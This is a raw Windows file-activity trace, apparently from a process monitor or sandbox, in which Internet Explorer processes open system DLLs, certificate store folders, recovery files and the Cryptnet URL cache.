11/3/2020 - 11:45:48.168Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.datRecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:48.168Read1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:48.168Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Temp\~DF87016B4E61313843.TMP~DF87016B4E61313843.TMP
11/3/2020 - 11:45:48.168Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Temp\~DF87016B4E61313843.TMP~DF87016B4E61313843.TMP
11/3/2020 - 11:45:48.168Read1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Temp\~DF87016B4E61313843.TMP~DF87016B4E61313843.TMP
11/3/2020 - 11:45:48.168Read1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:48.168Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:48.168Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:48.168Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:48.168Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:48.231Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Program Files (x86)\Internet Explorer\credssp.dll
11/3/2020 - 11:45:48.231Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\credssp.dll
11/3/2020 - 11:45:48.231Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\credssp.dll
11/3/2020 - 11:45:48.231Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\schannel.dll
11/3/2020 - 11:45:48.231Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\schannel.dll
11/3/2020 - 11:45:48.231Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft\SystemCertificates\My
11/3/2020 - 11:45:48.231Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates
11/3/2020 - 11:45:48.247Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates
11/3/2020 - 11:45:48.247Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs
11/3/2020 - 11:45:48.247Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs
11/3/2020 - 11:45:48.247Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs
11/3/2020 - 11:45:48.247Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs
11/3/2020 - 11:45:48.309Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Program Files (x86)\Internet Explorer\ncrypt.dll
11/3/2020 - 11:45:48.309Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ncrypt.dll
11/3/2020 - 11:45:48.309Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ncrypt.dll
11/3/2020 - 11:45:48.325Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates
11/3/2020 - 11:45:48.325Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates
11/3/2020 - 11:45:48.325Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs
11/3/2020 - 11:45:48.325Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs
11/3/2020 - 11:45:48.325Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs
11/3/2020 - 11:45:48.325Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs
11/3/2020 - 11:45:48.340Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Program Files (x86)\Internet Explorer\GPAPI.dll
11/3/2020 - 11:45:48.340Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\gpapi.dll
11/3/2020 - 11:45:48.340Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\gpapi.dll
11/3/2020 - 11:45:48.418Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft\SystemCertificates\My
11/3/2020 - 11:45:48.418Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates
11/3/2020 - 11:45:48.418Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates
11/3/2020 - 11:45:48.418Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs
11/3/2020 - 11:45:48.418Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs
11/3/2020 - 11:45:48.418Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs
11/3/2020 - 11:45:48.418Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs
11/3/2020 - 11:45:48.418Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\p2pcollab.dll
11/3/2020 - 11:45:48.418Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\p2pcollab.dllp2pcollab.dll
11/3/2020 - 11:45:48.418Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\p2pcollab.dll
11/3/2020 - 11:45:48.418Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\p2pcollab.dllp2pcollab.dll
11/3/2020 - 11:45:48.418Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\qagentrt.dll
11/3/2020 - 11:45:48.418Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\dnsapi.dll
11/3/2020 - 11:45:48.418Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\dnsapi.dll
11/3/2020 - 11:45:48.434Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Program Files (x86)\Internet Explorer\cryptnet.dll
11/3/2020 - 11:45:48.434Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\cryptnet.dll
11/3/2020 - 11:45:48.434Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\cryptnet.dll
11/3/2020 - 11:45:48.434Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow
11/3/2020 - 11:45:48.434Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow
11/3/2020 - 11:45:48.434Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow
11/3/2020 - 11:45:48.434Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow
11/3/2020 - 11:45:48.434Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData
11/3/2020 - 11:45:48.434Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData
11/3/2020 - 11:45:48.434Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow
11/3/2020 - 11:45:48.434Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow
11/3/2020 - 11:45:48.434Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow
11/3/2020 - 11:45:48.434Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow
11/3/2020 - 11:45:48.434Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288B
11/3/2020 - 11:45:48.434Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow
11/3/2020 - 11:45:48.434Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow
11/3/2020 - 11:45:48.434Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow
11/3/2020 - 11:45:48.434Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow
11/3/2020 - 11:45:48.434Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CFE86DBBE02D859DC92F1E17E0574EE8_5FA8E5E800867BF860DF5E533E701BAF
11/3/2020 - 11:45:48.434Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow
11/3/2020 - 11:45:48.434Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow
11/3/2020 - 11:45:48.434Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow
11/3/2020 - 11:45:48.434Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow
11/3/2020 - 11:45:48.434Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\85B3F147E3624A14E6A20DB4F6C2C5D9
11/3/2020 - 11:45:48.434Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Program Files (x86)\Internet Explorer\SensApi.dll
11/3/2020 - 11:45:48.434Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\SensApi.dll
11/3/2020 - 11:45:48.434Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\SensApi.dll
11/3/2020 - 11:45:48.497Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow
11/3/2020 - 11:45:48.497Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow
11/3/2020 - 11:45:48.497Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow
11/3/2020 - 11:45:48.497Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow
11/3/2020 - 11:45:48.497Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData
11/3/2020 - 11:45:48.497Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData
11/3/2020 - 11:45:48.497Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Program Files (x86)\Internet Explorer\WINHTTP.dll
11/3/2020 - 11:45:48.497Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\winhttp.dll
11/3/2020 - 11:45:48.543Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\winhttp.dll
11/3/2020 - 11:45:48.543Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Program Files (x86)\Internet Explorer\webio.dll
11/3/2020 - 11:45:48.543Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\webio.dll
11/3/2020 - 11:45:48.543Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\webio.dll
11/3/2020 - 11:45:48.543Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\pt-BR\KernelBase.dll.mui
11/3/2020 - 11:45:48.590Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Program Files (x86)\Internet Explorer\dhcpcsvc6.DLL
11/3/2020 - 11:45:48.590Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\dhcpcsvc6.dll
11/3/2020 - 11:45:48.590Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\dhcpcsvc6.dlldhcpcsvc6.dll
11/3/2020 - 11:45:48.590Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\dhcpcsvc6.dll
11/3/2020 - 11:45:48.590Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\dhcpcsvc6.dlldhcpcsvc6.dll
11/3/2020 - 11:45:48.637Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Program Files (x86)\Internet Explorer\dhcpcsvc.DLL
11/3/2020 - 11:45:48.637Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\dhcpcsvc.dll
11/3/2020 - 11:45:48.637Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\dhcpcsvc.dll
11/3/2020 - 11:45:49.59Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow
11/3/2020 - 11:45:49.59Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow
11/3/2020 - 11:45:49.59Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow
11/3/2020 - 11:45:49.59Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow
11/3/2020 - 11:45:49.59Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288B
11/3/2020 - 11:45:49.387Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow
11/3/2020 - 11:45:49.387Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow
11/3/2020 - 11:45:49.387Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow
11/3/2020 - 11:45:49.387Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow
11/3/2020 - 11:45:49.387Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData
11/3/2020 - 11:45:49.387Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData
11/3/2020 - 11:45:49.387Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData
11/3/2020 - 11:45:49.387Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData
11/3/2020 - 11:45:49.387Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288B
11/3/2020 - 11:45:49.387Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content
11/3/2020 - 11:45:49.387Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content
11/3/2020 - 11:45:49.387Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content
11/3/2020 - 11:45:49.387Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content
11/3/2020 - 11:45:49.387Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288B
11/3/2020 - 11:45:49.387Write2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288BCFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288B
11/3/2020 - 11:45:49.387Write2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288BCFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288B
11/3/2020 - 11:45:49.387Write2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288BCFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288B
11/3/2020 - 11:45:49.387Write2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288BCFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288B
11/3/2020 - 11:45:49.387Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288BCFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288B
11/3/2020 - 11:45:49.387Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288BCFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288B
11/3/2020 - 11:45:49.387Write2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288BCFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288B
11/3/2020 - 11:45:49.387Write2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288BCFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288B
11/3/2020 - 11:45:49.387Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288BCFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288B
11/3/2020 - 11:45:49.387Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288BCFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288B
11/3/2020 - 11:45:49.403Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow
11/3/2020 - 11:45:49.403Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow
11/3/2020 - 11:45:49.403Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow
11/3/2020 - 11:45:49.403Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow
11/3/2020 - 11:45:49.403Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData
11/3/2020 - 11:45:49.403Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData
11/3/2020 - 11:45:49.403Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData
11/3/2020 - 11:45:49.403Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData
11/3/2020 - 11:45:49.403Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288B
11/3/2020 - 11:45:49.403Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288BCFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288B
11/3/2020 - 11:45:49.403Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288BCFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288B
11/3/2020 - 11:45:49.403Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288BCFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288B
11/3/2020 - 11:45:49.403Write2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288BCFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288B
11/3/2020 - 11:45:49.403Write2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288BCFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288B
11/3/2020 - 11:45:49.403Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288BCFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288B
11/3/2020 - 11:45:49.403Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288BCFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288B
11/3/2020 - 11:45:49.403Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288BCFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288B
11/3/2020 - 11:45:49.403Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow
11/3/2020 - 11:45:49.403Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow
11/3/2020 - 11:45:49.403Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow
11/3/2020 - 11:45:49.403Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow
11/3/2020 - 11:45:49.403Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData
11/3/2020 - 11:45:49.403Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData
11/3/2020 - 11:45:49.403Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow
11/3/2020 - 11:45:49.403Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow
11/3/2020 - 11:45:49.403Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow
11/3/2020 - 11:45:49.403Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow
11/3/2020 - 11:45:49.403Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BE8B021F9E811DFC8C8A28572A17C05A_DC7BEFCD3E9D2C9B8A23614722575D83
11/3/2020 - 11:45:49.403Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow
11/3/2020 - 11:45:49.403Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow
11/3/2020 - 11:45:49.403Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow
